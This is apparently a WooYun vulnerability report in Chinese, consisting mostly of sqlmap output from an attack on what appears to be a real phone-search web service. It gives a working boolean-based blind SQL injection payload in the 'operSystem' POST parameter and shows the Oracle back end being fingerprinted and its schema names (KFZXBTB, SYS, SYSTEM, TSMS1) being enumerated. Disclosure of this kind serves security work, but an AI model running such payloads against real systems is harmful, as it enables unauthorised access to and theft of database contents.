WooYun.org

sqlmap获取数据如下：
当前库KFZXBTB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: reqUrl=phoneSearchCenterNew&brand=&operSystem=5') AND 2851=2851 AND ('PpGp'='PpGp&price=&screenSize=&mobileCPUType=&networkMode=&hasStock=false&supplierNum=&keyValue=%E8%81%94%E6%83%B3&brandKey=undefined&classifyKey=undefined&flag=
---
[21:10:10] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:10:10] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 3.0, JSP, JSP 2.2, Nginx
back-end DBMS: Oracle
[21:10:10] [INFO] fetching current database
[21:10:10] [INFO] resuming partial value: K
[21:10:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:10:10] [INFO] retrieved:
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n]
FZXBTB
[21:13:54] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'KFZXBTB'
[21:13:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
[*] shutting down at 21:13:54
available databases [4]:
[*] KFZXBTB
[*] SYS
[*] SYSTEM
[*] TSMS1
里面的库都很大，动不动就几千张表。。。